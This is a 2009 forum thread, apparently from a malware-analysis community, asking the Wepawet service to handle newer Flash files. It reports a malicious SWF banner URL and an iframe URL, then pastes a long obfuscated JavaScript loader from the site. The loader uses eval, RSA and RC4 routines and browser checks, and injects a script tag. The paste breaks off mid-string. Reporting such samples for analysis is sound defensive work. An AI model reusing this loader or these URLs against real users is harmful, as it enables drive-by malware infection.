Author Topic: Wepawet issues (Read 26343 times)

MysteryFCM · May 06, 2009, 11:20:27 pm

Can we get support for the newer flash versions added please?

http://www.clicksmanagementscom.com/banner/b87492/ggg-2-en.swf

Ref:
http://www.mywot.com/en/forum/3299-sign-of-the-times

Site also loads an iFrame to;

visitcouns.com/?t=1

Which returns content that's completely unreadable.

MysteryFCM · May 06, 2009, 11:25:39 pm

Got the content to return correctly;

Code: [Select]

<body><script>OJOVLR=self;window.GENWSF='e'+'v';OJOVLR=OJOVLR.GENWSF+'a'+'l';EJEFHF=window[OJOVLR];if(!EJEFHF)EJEFHF=document[OJOVLR];OJOVLR=EJEFHF;VYGLDW='';GQF='s.m=m}function NMQ(x';TTD='}function PCY(){v';IXP='is.n=QEE(N,1';HFM='BI_FP-B;A.prototyp';ZYS='n") break;b=b*';JEG='}re';HXF=' d=(1<<';OVO='i]>>(p';OCG='){ret';ENJ='=8)k=3;else if(b==2';IOY=';y=(y*(2-(';POE='.appName';MBV='KV=TZT;A.pr';QYU='c;r.t=i;r';DXK='d.charAt(i)';WUL='=(this.j+thi';WIG='}this.t=0;this.s=0;';TMW='i=0;i<a.length';PEB='e(--i>=0)if((r=this';GPB='J)>0)a.EK';HCL='function';LWH='[i]=i;j=';FPZ='his.t';VGF='[j]+=thi';GSH='ngth){a+=';XXJ='loor(Math.random()*a';TSQ=';s[j]=x;c';RFC='JZT(c,';KQJ='7ac76d88c3368c35';JSP='prototype.DV=(1<<B)';QCE='VFO(i);return';EMP='"!=typeof a)this.Q';JPI='0)ret';MVL='continue}mi=false';QXV='T=EJJ';IDK=',b){ci="';MUT='j,c,n){var a=x&';GHU=',1);if((r[i+x';TZF='=x.am(0,y[i],';QXJ='}function ZIX(';MWM='b)-1;var e';YZN='h=this.mp';BHB='nction ZWO(x){t';KUN='eturn 0;var x=';YOM='d=(1<<b)-1;r[';MBC='{z.XKS';JZL='i=(i+1';NDW='v;rr="a".charCodeAt';NKH='WD=0;RIP()}f';GEK=';var BI_FP=52;';BTS=')}SEU=((0xde';TTE='h.sin(oil)*21));';YZS='){x=t';POV='sss="";for(';FDX='ction Q';MSU='256)k=8;else if(b==';OKE='O(this.e,this.n';FGF='CJI(b){if(';RCD='(a,(this.n.';OIX='r v=x';JJJ='m.EKV(r';ZXB='s.DB){this[this';HZZ='10ec1246fa9068f78';OSR='crosoft Intern';HFO='KM=QRQ;A.prototy';GUE='M(A.FVJ)>0)this.';YVF=');res=rsa.encry';SVJ='tion ZJB(x){ret';UZY='6);if((h.len';HWW='s[i]=s[j]';ZVW='is.VBX(r);retu';RBQ=')];return(c==nul';VDX='(d)}}re';FXY='[i-1]';ZKS='on FHD(m,q,r){va';PJB=';return}if(r==null)r';QQH=';A.prototype.E';DBU='vigator.appVersi';SIS='his.e=0;t';SGZ=']=c&this.DM;c>>';GLJ='TZY=HT';CGS='0]=this';QJH='+]=this.DV+c;el';UVT='e.OYN=PCY;A.prot';KHS='n r}fu';GJZ='<=0){p+=';UJR='z.ZXK(r2,g,r);el';ZLM='K(r){for(var i=th';LEN='ix(s,b);return';MGN='*y)&0xffff)))';YOS='.XKS=PFD;functi';RZE='this[i];r.t=t';VMY='or(i=0;i<x.t-1;++i)';VTV='f(k==8&&(s[0]&0x80)';NRU='s.m,null,r);if(x.';YJH='his.m=m;this.mp=m';UPM='x=t;r+=8}if((t=x>';BCK='}func';ELB='==4)k=2;else return';TTX='{if(b<';WQY='ototype.QYW=UVT;A.pr';PSS='j=0}fun';FET='urn(this.s';HJM='=BHF;A.prototype';OJR='ffff}return c}f';URW='3;else i';DPV='!=0){t';YQO='otype.YWW=GZ';JXG='1]|=((1<<(th';BTF='){';GHY='s[i]&d)<<c;';SMW='this.i=(thi';CFK='g.fromCharCo';ZNM='t(KFY);for(RWD=0;RWD';WBM=' OVS(b)';FHP='ile(--i>=';RRI='=="="||';XQY='r.s=th';WGQ='var c=t';WKO='NYB(s,n){var a="";v';DGM='6;++vv)RH';NWG='unction ';TBB='DB}c+=this.';TZC=']=i;';WFO='otype.mod=URR;A.prot';NMZ='n QEE(a,r)';GJS='return(y';WGF='(m);if';TOH='&0xfff';HOY='null)?nbi():q;y.YWW(';POK='=c.SLR(1';TCU=']=vv;function GJM(n';ZNG='(d.charAt(i));c=';KVN=' h;else ret';DWB='otype.EWO';COR='ion E';OND='+=Strin';TNX='if(isNaN(oil)){k=';OXN='length])&255;t=th';YXZ=' scriptTag=';SUD='createElement("scr';ROL='.EKV(this.m';QFC='DB;--i}';TKL='.length)';BSJ='TUVWX';DIB='C.prototype.init=X';VKZ='r);while(';BPQ='if(sh>0)this[this.t-';BHT='0;if(c<-1)r[i+';MNF='a="";';MOI='pt(sss);';SSN='rypt(a,b)';GPY='}var a=n';MWV='is.t-1;i>=0';UPU='0;for(i=0;i<2';FIL='urn"0"+h}RSA';HXU='])';IRG='eturn';IVT='0;i<b;';EER='rypto.';ZVQ='tion RSAKey(){t';BTH='=parseInt';ZTX='r(n/this.DB);i';FXI='ull,r);i';FJL=';while(i<m){c+=this';ILM='BQY,53);a';UYP='CR;RSAKey.p';ONS='oil;oil=0}s=new';TLC='[(s[i]+s[j])%256';SNI='Y=new ';LFN='RX;VXC.prototype';QHF=';var r=nbi(),r2=n';VJE='se{va';UPE='PFD(x';FDM='){return';HZI='lse this.t=0}fu';GUJ='m.s;var c=this.DB';CXV='T;A.pro';VCY='n r}function H';WZZ='ll;th';OHD='ion PQE(a,';RYE='ction A(a,b,c){if(a!';PFL=')-1;g.TZY(r);while';NUU='turn m?r:"0';ZVH='lmnopqr';MNK='{x=t;r+=1}retur';UBP='rototype.ZXK';BDN='6*Math.random()';YTO='>=0){var k=(r[-';BJL='.prototype.';RLI='<KFY.leng';QOF='unctio';FNV='.DV){';KZL='i();this.abs().';SEG='i];r[i++]=';WWZ=')RHZ[rr++]=v';ZSB='UW=nul';LSO='ing.fromCharCode(';ONI='=4;else if(b==8)k=';ZSD='e,z){if(e>0xffff';CIB='TZY(r);th';LQK='&this.DM;c>>=t';RQL='E!=null&&N';BOT='+=this[';LDW='h+k>thi';FRL=';r.OYN()}functi';YDJ='[j++]=l&0x3ffff';XDS='n){while(--n>=0){va';LHF='KM(this.m)>=0)x';VUG='(c==1?';BKN='+]=t>>>8;K';QBY='this[i]>>b}if(b>0)r';YEI='n rc4Dec';NKE='YN();if(c>0)r.KSV(c,';VIG='ag.src="?"+res;doc';BGG='==0)return;var g=f*';STK='j=(j+';HBW='s.charCodeAt(i';YIZ='{var d=Math.f';QIG='x&0xff';CVK='6;var VHY;';MYI='type.SLR=CJI;A';OIY='m(i+1,2*x[i],r,2*';FDN='gth&1)==0)r';KCP='V(t,r)}}if(q!=n';VZX='ew Array();v';CYM='>28)+(m>>14)';VZS='0,this.';SDU='nction';ULC='V(r,r);retur';ISQ='r){var x=this.abs()';DJL='ength';MGC=')<<(k-p);d|=this[--';ESF='=(x>>8)&255;KFY[RW';ZDF='turn ci}';DMW='=null)if("numb';KDV='this.VBX(r)}';UML='le(i>=0&&n>0)a[--n]=';DNG='=(y*(2-(((x&0xffff)';ZPF='type.doPublic=ZJB;';PWP='i+n]=this[i];for';RYD='funct';DTX='(--i>=0)';ODG='.EKV(q,q)}r.t';KWW='(1<<p)-1)';IVO=')}UWR.proto';GJY='mp&0x7fff;this.mp';XPY='i]&0x7';IFP='r i=s.length-1;whi';ZPG='unction IVS';JID='.encrypt=HBJ;';QFJ='f(b==';IML='fghijk';MRR='s.m.am(0,a,x,i,';CUH='nction hexToString(d';BRJ='f(this.s<0';IRJ='30ab118834d';MJW='2ec26a4a6be8685';RVS='+]>>14;var m=xh*';MFR='s;while(i<this.t){c';LXL='DM,i;for(i';LFB='ar rr,v';HSX=' h=this.FV/';BTD='is.QUF=null;this.E';IPE='if(oil>1){oil=MII(';XMU=' LMO(s,n){if(n<';PJF='0)r[i]=0;for(i=0;i';JFJ='RSAKey.prot';IXQ='rsa=new RSAKey();rsa';GNN='4f2af68d26c8a815';TJK='.ONE.YWW(d,t);t.EKV';XPB='r(vv=0;vv<=9;++vv';IUO='0);for(vv=10;vv<';NCI='&this.DM;while(thi';DIL='c;r.t=this.t-a;r.';ZUU='A.prototype.FV';YCZ='return new A(a)}func';QPI='(--i>=0)r[i]=0;f';KRG='.protot';FVO='function';HTW='s.t-1]|=x<<sh;sh';HKN='s[i]>>p)>0)';LWW='2)k=1;else';TCJ='f)==0xefcafe);fun';JJH='rstuvwxyz";var RHZ=n';VWI='&0x3f';HNZ='12138513';UYS='EQY(x){return x}f';YSO='rn r}function YJG(';PWQ='s.mpl=this.';ZSE='urn null';FOW='tscape"))';ZBZ='urn 0;var y=';BSY='bs();var ';MGH='z=new UW';FEH='s[this.t++]=(x>>';ILO='b==16)k=4;else if(b=';HUM='.prototype.OBN=H';VYE='x){KFY[RWD++]^';ZUG='.length';LNB='50882';BZZ=')+"\\n";i+';IJT='.DB-sh))-1))<<sh;thi';BMM='&&r.PKM(A.FV';MOT='urn c}if(SEU&&(navi';DMT='_FP);A.pr';DOU=',sh=0;while(--i';CWC='i<this.m.t;++i){v';WMO='ITF()+7)>>';KQQ=')return r;var ';VSE='lse if(x<-1)th';KMQ='v;rr="0".charCo';ODX='on<"5"&&window.cr';OPI='=this.s-a.s;if(r!=0';XIE=');RWD';QSQ='is.S[j';SLI='l;this';POH='M))}function G';SWL='type.abs=KHO';MEI='(0);for(vv=10;vv<3';SWJ='=true;';RJU='&(d=thi';RIK='is[0]=x+DV;e';EJU='er"==typeof a)thi';BZU='while(--n>=0){var l=';MBG='(i=oil;i<256;i++)';ZFQ='ion VT';YSP='.t]+=x.a';LHJ='l<53;oil++)sss+=Str';NFS=' r}function KTQ(s,b)';BON='ffff|';XBB=' if(b';XEN='(x){var';OGH='F1)/g,e=1<<this.F';ZSZ='on UYK';ZIM='C;B=30}else if(S';FDY='}oil=0;funct';RQM='ype.VBX=YJG;F';SBZ='*l+((m&';NNB='{m=true;r=GJM(';ZIV='e.F2=2*B-BI_FP;var Z';GMP='is.S[this.j]=t;re';EQS='.CME=null}function I';HSN='r t=r;r=r2;r2=t';TSL='6;++i)';BYJ='N();if(mi)A.';IUF='xp(e,z)}A.proto';GGL='(r,r)}function U';HSE=')}function HBJ(a){';TRM='.QWB(this';FTF='.setPublic("983';JMH='otype.setPublic=I';DLG='n QYQ(n,r){for';OCX='W(j,t);r.EKV(t,';OCF='{';LQF='RHZ[rr++';SZX='g.fromCharCod';XTN='unction ';HNM='++]=x;else if(s';YGB=',w,j,c,';DVS='--);a';QCF='r){var i';ZEQ='++]=z.charCodeAt(t)';KNC='EKV(t,r)}A';PNW=' Array()';CRR='ZT(n,';KBM='f4c2d744e';ZMY='l)}function LGD(i,x';OVR='0xf)*y))&0xf';WOL='(d,d+1)';GRW='ff}ret';EJN='mpl+(((j*this.mp';VKG='.t>0)?(this[0]&1';KTB='<=0)re';KJX='document.';ING=')&255;if(RWD';OQO=';k+=';ZLG='=null;t';RPZ='urn r;return';MGZ='avigator.a';MTR='=x&255;KFY[RWD++]^';CMY='B-15))-';UBE=' RIP(){IKH(n';CNP='=QWX;function ';VWN='turn V';SCY='CR(N,E){if(N!=null&&';CSP='[--n]=0;';CRB='pe"&&na';KWL='LGD;B=26}else{A.p';SGM='+y.t;wh';IPV='0;r.OYN();i';ZTM='.next';YVC='oil=0;oi';YRM='])&255]}VX';CUC='ar i=a+1;i<this.';LDY='.DB*(this.t-1)+MWY(t';FXV='s.charCodeAt(i';PWW='23456789+/=";fu';TXY='Z(e,m){var z;';PQE='a;a=k;';XBY='%k;if(';DEI='[i]=this';DSY='b)|c;c=(this[i';HQY='his.n';SMD='i],r,2*i,0,1);r.s=0';IEX='r,i,0,x.t);r.s=';JGH='=this.DB}c-';YQQ='[a]>>';BPV='=n}retur';MHB='ZZ.prototype.';MDT='3);if(';QEM='[i];r[i++';ZJN='e(b.c';LFX='=2;a[--n]=0;';VPG='uncti';KQO='l+h*a;l=a*l+((m&0x';REW='this.S[i]+a[i%a.';MLW='rotot';RDX='type.';IYW=' ZSY.char';NLT='is.S[i];this.S';JVZ='FQV=EQY;UWR.proto';BIO='nextkey=res;var';YJB='on WWM(){if';XCK='type.exp=ZIX;A.proto';HMY='D++]^=(x>>16)&255;K';XDJ='[i]-a[i];r[i++]=c';LZR='totyp';OXI='et Explorer")){A.p';MPF='is.VBX(r)}f';XHS='eturn c';DZX=' r=nbi();x.abs().Y';HHG='0x10)return"0"+b.SL';MCT='b==32)k=5;else if(b';FVZ='ypto){var z=window.c';YOL='s.t>0&&this[this.t';LMF='type.DYC=NMQ;UWR.p';BZV='se if(c>0)r[i++]=';DLI='c!=64)';YQB=' QRQ(a){var r';BLG='turn x.mod(this.';NEV='r m=xh*l+h*a;l=a';ZEN='is.s<<a)';QNL='[e]=c;r.t=';OJZ='s.S[t';EXR='&x.DM;j=i+this.m.t;x';NVX='B=B;A.prototype.DM';YQZ='Y=PES();VHY.ini';EMR=' z=new FZZ(m);ret';XME='WCI(s,i){va';BPR='h+(x[i]';RZH='.OYN()}fu';UBF='0f78625c';DVR='a[--n]=x[0]';MXI='{var c=x.';ILB='s=(x<0)?-1:0;i';VLV='p<k){d=(this[i]&(';XSZ=';for(i=t';FHZ='>4)!=0){x=t;r';HUH='=nbv(0);A.ONE=nbv';UTQ=');if(ts!=ms)A.FVJ';QDI='is.DB-sh))-1)<';VMN='e(i<a.t){c-=a';WEX='>=0){v';EZK='V){r[i+x.t]-=';UHB='XKS=PWS;func';HLB='.t-1]|=(x&((1<<(this';WDM='(y,y);while(y.t<d)y[';TNO='r f=y[d-1];if(f';HOI='this.t+e+1;r.s=this.';LBG='t<this.t){c-=a.';DPX=',j,t;for(i=0;i<25';OCN=' RQL(r){var x=this.a';ETD='LQ;A.proto';JGL='ENT(r);this.VBX(r';UEH='=WEV;UWR.pro';FXB='x(this.t-n,0);r';MZY='r)}fun';UKE='this[i]&0x3f';MVQ=')+xh*h+(c>>>30);w';ZHR='m.t);';WVP='TT(y,r);th';GOS='f(r.t>0)r[r.t-1]+=x';VNH='|e<1)return A.ONE';HVH='c=(l>';ZOH='ile(--n>=0){var l=th';ZSJ='th.ma';HMR='bi(),g=z.DYC(this),i';VDY='s.mt2=2*m.t}f';HBI='r(var i=0;';QOR='[this.t-a-1]|';NTY='totype.QWB=QYQ;A';JEZ='s.t;va';KSO='totype';KLN=';b.TZY(r)}va';NPS='a,r)}f';FHK='>0){a.JZT';EXK=';this.S=new';EIP='++){';IYP=';--i)r[i]=';OUF='();var x=new';OSS='";for(i=';FSL=';r.t=i';FSE='==32)k=5;el';WEV='s<0&&r.PK';PXK='unction MLW(x){x.CIX';VMW='on UVT()';KKB='PES(){return new V';ESV='(i=n-1;i';DKH='.ENT=RQL;A.protot';LKG='.am=FBO;B=28}A';QTZ='-1]==c)--this';PJE='=Math.floor(6553';YQT='his.DB';TUN=',r,j,0,d))<k){y.YW';CLP='l)?-1:c}fu';YCN='ar r=nbi();A';XCR='=0;t<';VOD='b){k="";';GZP='urn x.EW';ZXP=';return r}fu';XIL='x>>1)!=0)';MXW='f((t=x>>>16)!=0){x=t';LDR='this.s<0)return"-"';UOM='0x4000000';LHC='3fff)<<14)+w[j]+c;';XUF=',r){x.ENT(r);';LOI='(VHY==null){RIP();VH';VVT='i=r.t=2*x.';MRJ='x){whil';LYB='i-->0)';JVD='FQV=HPJ;FZZ.protot';DRO=');if(r!=null)this.';SUW='=((1<<B)-1);A.';SRY='x>>15;wh';CRW='his[this.t';RLG='=null)q.VFO(0';TUJ='this.';RQY='K;A.prototype.V';WNK='&0xfffff';KNG='Z[rr++]=vv;rr';FDU=',r);thi';OQK='{if(p<this.DB&';NWQ='r[i]<--';YUQ=']=s[j];s[j';EDJ='var i=s.l';MDY='Array(';PKX='{d=(this[i]>>(p-';JKD=';this.j=0';MUI='}else this[thi';ZKL='i)=="-")mi';UZC='return a';GWB='<0){if(s.charAt(';NCP='nction HT';PWH='(i*this.DB)';QOD='.s=this.s}funct';CPN=',mi=false';GEY='nction UWR(m){thi';KDQ='YZabcde';IOB='s[this.t';RMJ='adbeefcafe';FPX='}function FBO(i,x,w,';UMQ=');w[j++]=v&0x3ff';CBH='n WWMs(a){var i';JFR=';if(sh==0)thi';EHG='r[i+e+1]=(this[i]>>';VQG='<sh}this.OY';DOF='&(1<<i))>0)';OVT='ar i=0;w';MPV='ngth>0){th';OTU='-a;var';CUV='pe.ITF=YSB;A.prot';THW=')k=1;else if(';JED='eAt(i%a.length))%25';BPP=']&d)<<a}for(i=e-1;';YDB='tion DLT(){r';QKT='.DB)sh-=this.DB}i';VNE='ument.bod';WUO=']=x}i=';FNC='WW(this.m.';KFX='BQY="ABCDEFGHIJ';LBU='0;this.';UBL=';r+=2}if((t=';ZET='am(i,x[i],r,2*i,0';BUE='>>15)*this.mp';XXC='}}return z.FQV(r)}';YWX='JJ(n,r)';QYE='V))%this.DV;';HNB='fff;var a=(j*this.';WGI='<a.t){if(q!';NNG='ff;var h=this[i+';ECB='|x.PKM(this.m';FOS='-MWY(a[a.t-1]);if(c';SVI='i=this.t;r=i-a.t;if';DBV='=nbi();var y=nbi(),t';WZH='=a.s}r.s=(c<0)?-1:';EYZ='th;++RWD)KFY[';JJV='n a+s.substring(i,s';RCV='rseInt(b/c));';OBO='PJ(x){var r=nbi();x.';PEI='arCod';TPU='[i]-a[i])!=0)ret';HGE='s)A.FVJ.EKV(r,';HFZ='FY[RWD++]=t&';TQV='OYN()}function T';HNS='2;var i=r.t,';RJZ='r p=this.DB-';FZN=' 0}function MW';EHN='}WFW.protot';BXB='FO=ZWO;A';JYZ='s.VBX(r)}FZZ.p';NKQ='.length>0&&E.le';JPK='harCod';ERU=');ci+';WZU='s.QZP(a,';LGZ='this.um=(1<<(m.D';DGT='turn;var b=this.ab';UUM='-i]==f)?';YKK='r a=m.abs();if(a.t';DLC='{var i';ECS='ar j=x[';JMI='nctio';NXV='oil;j=oil;';KSC='urn t';VCB='}x.OYN();x';KLK='2-x*y%this.D';BEV='his.i=0';QJQ='his.DB-b;var ';NQM='(1<<this';PWN='B(){if(this.t<=0)ret';MZJ='j=oil;for';OGN='ffffff);c=(l>';FQZ=';A.prototype.KSV=UYK';TWM='FZZ(m){t';RUM='.S[j];th';DYI=' Arra';IKL=' MII(a';GLI=');KFY[RWD+';TUI='>>30)+(m>>>15';CKD='{var a=n%';TRT='.QYW();thi';RPJ='his.t=';UJP='y()}func';SUR='[j]+c;';XTG='=Math.pow(2,BI';PNB='se if(b=';RBT='0x3fff,xh';GEU='}function';LWE='[this.i];this.S[this';DPM='{a+=Strin';HJW='+e)*d2);if((r[i]+=y';NGQ=':-y}function ';XFQ='b;for(v';FEM='h=this[i++]>>15;va';GCK='+=this.DB-k)}else';GQD='"}function HLQ(){v';FNI='Number(a,b,c);else i';XRW='(j+s[i])%';HOU='rototype';MTQ='s;r.OYN()}functi';ICY='f(this.s!=a.';RBJ='b.SLR(1';LLU='y.t++]=0;while(--j';KTE='his.i])&255;t=this.S';NFD='[x.t++]=0;fo';TFW='=a.substring';BLK='while(x[j]>=x';VVN='e(i>=0){if(';RID='-1]^(this.s&this.D';GGP='>>15;';PVI='Y(x){var r=1,t;i';GOU='+]=1;r.';RKO='ototype.ETT';IBG='j,t);if(r.PKM(t)>=0';CUR='ppName=="Netsca';BBD=';scriptT';SMO='.t=this.t';HKY=']=t}this.i=';QLC='=0;var t;if(n';CHV=',x)}function PWS(x';XKM='0;while(x[0]==0)b.Y';IFL='n(a.t,this.t)';ZTT='0)m=true;if(m)r+=GJM';YMU='s.from';CMO='var KFY;var RWD;f';WYR='xff:WCI(s,i);if(x';UPS='ipt")';OKR='his.DB;var c=t';KEG='}if(d>';OGB='ptTag);';POL='this[0];if((x&1)==';ZRQ='):this.s)==0';OIV='6789abcd';NME='k)r.EK';URG='y.appendChild(scri';DNQ='urn 0;return this';IFN='(var i=n;i<this.t';PBU='b%=c}}';PPI='(r,r2);if((e';NMS='){if(x.s<0|';TPH='XC()}var R';GUD='r);if(ts<0)A.FVJ.EKV';IID='BI(x);';HON='s=this.';HNO='{A.prototype.am=';QCN='unction IKH(';GIK='nction nb';JUY='n null';YPB='.F1)+((d>1)?y[d-2]>>';RXZ='-1;i>=0;--i)r[';QSC='null;this.q=nu';BJJ='=4)k=2;';VLI='r[i-a]=';MNJ='256;x=s[i];';QHB=';for(';FZK='n r}function YS';QYI='ZZ.prot';SIH='=(this.s&d)<<';WFX=';++i)a[i]=W';CDD=';++i)r[i-n]=this[i';YQS='{return PQE(a,b';JFW=';i++)s[i';FUF='Math.floor(75+Mat';RTP=',r){x.';BLX='SY="012345';SCS='CIX(a,n';GIP='f(a>=this.t){r';OQZ='unction ';UMS='deAt(0);fo';BXS='EU&&(navigator';WIF='tion XRX(a)';LTR='6)}function';ZGR='(n,r){';JYU='ype.CIX=FHD;A.pr';PBY=' a=(1<<k)-1,d,m=f';EZT='ype.YBI=WWMs;functio';YRD='f(b==null&&"string';SCT='t,r);r.CIX(thi';KWX='c="";for(y=0';EPP=' this.toRadix(b);var';WPU='ll)return null;';RLZ=')}if(KFY==null){KF';NYO='EC=25';BFX=';y<b.length;y++){';FIR='gator.appName=="Mi';MJE='(c,y);b.';NML=')>=0)re';WVV='.FVJ.EKV(this,r)';VYM='+=4}if((t=x>>2)!=0';IDW='this.DM:Math.fl';VTJ='+=k;if(sh>=this';RBM='BN().SLR(b);va';OUR='hile(RWD<REC){t';DLZ='y();while(n>2){x[0]=';CQE='efghijklmnopq';KUE='&this.';DGI='B;var b=t';IYT='(this.DB-sh))';IHR='RWD]=0;RWD=0}re';HHD='eAt(y)^s';FDK='=d;r.O';QLB='Key.proto';DQC='>0)?th';PLZ='R(m);else';OQX='=x.DV;x[++j]++}';JZG=',y=a.abs();var i=x.t';RKQ='s}else{';OSD='random(32);for(t';REF='his.e';JZT=';var h';IWE='f(x>0)this[0]=x;e';RRC='ype.DYC=IVS;F';VUS='rototype.am=IV';UXY='];r.t=Ma';WZO='d)}whil';NYT='ew Array();va';IYS='.prototype.D';TQM='64+BQY.indexOf';JNC='s[i]+a.ch';EXP='x=s[i];s[i';JBI='eturn((this';OWG='pe.FNV=DLT;A.proto';LQT='b)}function nbi(){re';ELW='&255}w';YCB='.i]=this.S[thi';MJP=';A.prototype.P';UIF='e return ';KLV='=k))&a;if(p';QRV='oor(r[i]*h+(r';OBE='x&3;y=(y*(2-(x&';CTZ='r k;if(';RFP='.m.t,x);if(x.P';GOT='HY.next()}functio';DXX='!="Ne';VTP='+this.O';SDD='for(i=oil;i<256';EQR='m,null,x)}fu';LPR='=ci};var m=LMO';OMJ='992751","10001"';DCP='de(pa';DQT='(c==nul';CCJ='otype.ZXK=FZI;FZZ';SJQ='=Math.floor';TED=';r+=16}';QXZ='1;this.';KGX='.t}function ';XUX=')*y))&0xff;y';OXV='ZP(a,256);else thi';KLI='ototype.F1=';MHV='s.length+11){ret';FWV='ew Date().getT';DJZ='his.d=null;this.p=';YUW='>=REC)RWD-';ZWD='="A".charCodeAt(';ZIY='j=i-d,t=(q==';ULN='s();if(b.t';XTC='v(i){var r=nbi();r.';DHM='KLMNOPQRS';VHB='if(';RYS='.prototype.JZ';NQS='c&this.DM;c>>=this.';NWW='0x7fff)<<15)+w[j]+(c';JMZ='i>=0;--i)r[i]=0;r';CSN='is[i]&0x7fff;var ';EVH='c+=this.s;whil';TWW='=0,c=0,m=Math.mi';YBM='s,ms=';HZG='RR(a){var r=nb';UXQ='alse,r="",i=thi';USP='{if(this.t<1)r';YXH='this.F2:0);var';GPQ='}functio';MJG='x.DV;r[i+x.t+1]=1}}i';FSI='*this[';DHS='is.DV-y';IJQ='c=Math.floor(v/';ZOR='turn new A(nul';JDV='ction';QTM='w[j++]=l&0xfffff';NVE=',r);retur';GSK='r c=RHZ[';BSC='e(x.t<=this.mt2)x';DPL='s.i+1)&255;this.j';EQP='this}fu';UPB='m==nu';XNR='){r[r.t+';WOS='i+1,c,x.t-i-1))>=x.D';LNM='s.s}functio';JHM='n BHF(a,';VGY='.S[(t+this.S[this.i';FRP='if((t=x>>8)!=0){';CUJ='nction KHO(';CCK='nction WEV(x,y,';FNK='s.substring(i,i+n';LYE='r d=y.t;va';CBU='turn this';GHS='=x>>14;';RII='=REC}function';BGC='64:c/4);if(';ZZQ='his.t;r.s=this.s}fu';RCB='i++]+w';PLG='t;++i){r[i-a-1]';JNK='b20094bded52ed';MGI='this.D';ZWW='i++)';XGP='+xh*h;';HGM='R(16);els';NTO='+n;r.s=thi';VXL='ar c=this.s';WWF='.t=0;return}';XKZ='56;++i){j=(j+';DTP='s.j];th';WXP='=MWY(e';SDV='his.s=-1;';DNM='this.S';FWX='r)}else{a.TZY(y)';EBC=')%256;j=';CCX='f;y=(y*(';HJB='or(i=0;i<d.length;i';HFP='fff}return c';DWX='l)retur';TTW='(n/this.DB),c=(th';GXP='ototy';LDO='if(e<256||m.FNV())';RRO='(1);function VXC(){t';UFJ='1;thi';RFF='his.doPublic';MHP='{return new A(';JHV='ype.QZP=KTQ;A.pro';KLT='ull){r.QWB(d,q';GCS='WX(){var t;';NRY='x[j]-';OMY='ZT(a,r){var i';BWJ='{var k;if(b==16)k';YUF='his.DB}if(a.';WHX='m);else return x}f';DHZ='ime()';RLS='.am(i,x[';LJZ='.am(0,k';UXR='|=(thi';VZW='l)&this.um)<<15))';DVT='g,d2=(1<<this.';QVY='b=0;c=1;f';KPQ='36;++vv)';LCK='At(n)}function ';QDY='rototype';BGY='TZY(r)';YFN='var b=new WFW';QGD='=this.t-1;i>=0;--i){';IUR='rototype.';ZBP='(r!=0)return r;whil';RLH='<y.t;++i)r[i+x.t]';SGX='type.VBX=MLW;UWR.p';HMX='n IVC(i,x,w,j,c,n)';SXW=' Arra';DXQ='WM()}function WFW(){';YSH='hile(i+n<s.le';KSM='ar x=(k==8)?s[i]&0';PKE='}r';EFP='6;';OYZ='{var a=x&0x7fff,xh=';JDP='(this.';ZGV='else{this.fromRad';WJD='z.length;++t)KFY[RWD';HCU='>=0;--i)r[i]=0;r';JZD='(E,16)}';LMT='d.charAt(i)=="\\';QVK='var b=n%t';KME='FY[RWD++]^=(x>>24';YNR='stuvwxyz01';GNT='is.s;var a=Math.floo';LPQ='t;while';XOO='<0)?this.OBN():';WSQ='255}R';NZN=' FZI(x,y,r){x.ETT(y';SFX='FVJ.EKV(this,this)';QNS='=VTZ;A.FVJ';NHS='}a[--n]';NPY='r){x.E';PPL='6);this.e';VYGLDW+=HCL+IKL+IDK+OSS+IVT+ZWW+YIZ+XXJ+ZUG+ERU+TFW+WOL+JEG+ZDF+KFX+DHM+BSJ+KDQ+IML+ZVH+YNR+PWW+CUH+BTF+MNF+QVY+HJB+EIP+VHB+DXK+RRI+LMT+ZYS+TQM+ZNG+VUG+BGC+DLI+DPM+CFK+DCP+RCV+PBU+UZC+FDY+OHD+VOD+TNX+ONS+PNW+OQO+PQE+SDD+JFW+TZC+MZJ+MBG+OCF+STK+JNC+PEI+JED+EFP+EXP+YUQ+WUO+NXV+KWX+BFX+JZL+EBC+XRW+MNJ+HWW+TSQ+OND+SZX+ZJN+JPK+HHD+TLC+HXU+PKE+XHS+GPQ+YEI+SSN+YQS+BTS+RMJ+WNK+TCJ+RYE+DMW+EJU+YMU+FNI+YRD+EMP+OXV+WZU+LQT+ZOR+ZMY+YGB+XDS+OIX+FSI+RCB+SUR+IJQ+UOM+UMQ+OJR+QOF+HMX+OYZ+SRY+ZOH+CSN+FEM+NEV+SBZ+NWW+VWI+OGN+TUI+MVQ+YDJ+HFP+FPX+MUT+RBT+GHS+BZU+UKE+NNG+RVS+KQO+LHC+HVH+CYM+XGP+QTM+GRW+MOT+FIR+OSR+OXI+VUS+ZIM+BXS+POE+DXX+FOW+HNO+KWL+QDY+LKG+IYS+NVX+SUW+JSP+GEK+ZUU+XTG+DMT+KLI+HFM+ZIV+BLX+OIV+CQE+JJH+VZX+LFB+KMQ+UMS+XPB+WWZ+NDW+MEI+DGM+KNG+ZWD+IUO+KPQ+LQF+TCU+FDM+IYW+LCK+XME+GSK+HBW+RBQ+CLP+NCP+ZLM+MWV+IYP+RZE+ZZQ+BHB+RPJ+QXZ+ILB+IWE+VSE+RIK+HZI+GIK+XTC+QCE+NFS+BWJ+ONI+URW+QFJ+MSU+LWW+XBB+FSE+PNB+BJJ+ZGV+LEN+WIG+EDJ+DJL+CPN+DOU+WEX+KSM+WYR+GWB+ZKL+SWJ+MVL+JFR+IOB+HNM+LDW+ZXB+HLB+IJT+FEH+IYT+MUI+HTW+VTJ+QKT+VTV+DPV+SDV+BPQ+JXG+QDI+VQG+BYJ+SFX+TTD+VXL+NCI+YOL+QTZ+KGX+FGF+LDR+VTP+RBM+CTZ+ILO+ENJ+THW+MCT+ELB+EPP+PBY+UXQ+JEZ+RJZ+PWH+XBY+LYB+OQK+RJU+HKN+NNB+WZO+VVN+VLV+KWW+MGC+OVO+GCK+PKX+KLV+GJZ+TUJ+QFC+KEG+ZTT+VDX+NUU+GQD+YCN+WVV+ZXP+CUJ+OCG+FET+XOO+EQP+SDU+YQB+OPI+KQQ+SVI+ZBP+PEB+TPU+RPZ+FZN+PVI+MXW+TED+FRP+UPM+FHZ+VYM+YZS+UBL+XIL+MNK+FZK+PWN+DNQ+LDY+CRW+RID+POH+CRR+QCF+XSZ+FPZ+RXZ+PWP+ESV+HCU+SMO+NTO+LNM+DLG+IFN+CDD+UXY+ZSJ+FXB+QOD+COR+YWX+CKD+MGI+DGI+YQT+OTU+HXF+MWM+SJQ+TTW+ZEN+KUE+LXL+QGD+EHG+DSY+BPP+JMZ+QNL+HOI+MTQ+ZSZ+ZGR+X